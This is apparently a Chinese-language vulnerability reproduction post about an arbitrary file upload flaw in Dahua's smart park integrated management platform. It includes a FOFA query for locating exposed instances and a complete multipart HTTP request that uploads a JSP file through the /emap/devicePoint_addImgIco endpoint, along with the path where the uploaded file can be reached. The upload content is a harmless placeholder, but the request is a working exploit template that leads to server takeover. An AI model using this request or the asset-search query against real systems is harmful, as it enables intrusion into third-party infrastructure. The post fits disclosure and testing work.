大华智慧园区综合管理平台任意文件上传漏洞
发布时间
阅读量:
阅读量
大华智慧园区综合管理平台存在文件上传漏洞,攻击者可通过/emap/devicePoint_addImgIco接口任意上传文件,导致系统被控制。该漏洞影响范围为大华智慧园区综合管理平台,资产测绘截图显示系统登录页面,漏洞复现通过构造特定数据包上传测试,验证漏洞存在。
一、漏洞简介
华智慧园区综合管理平台是一个整合智能化、信息化、网络化、安全化等多方面功能的智慧园区管理平台,旨在为园区提供全方位的综合管理服务,涵盖安防、能源管理、环境监测、人员管理、停车管理等多个管理领域。该平台存在文件上传漏洞,攻击者可通过特定接口上传文件,导致系统被攻击并被恶意控制。
二、影响版本
- 大华智慧园区综合管理平台
三、资产测绘
FOFA:app=”dahua-智慧园区综合管理平台”
登陆页面:
四、漏洞复现
构造如下数据包:
POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
User-Agent: Java/1.8.0_345
Host: 127.0.0.1:8009
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 223
Connection: close
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
Content-Disposition: form-data; name="upload"; filename="1ndex.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
123
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--
上传文件访问地址:http://127.0.0.1:8314/upload/emap/society_new/ico_res_67aaf6075952_on.jsp
全部评论 (0)
还没有任何评论哟~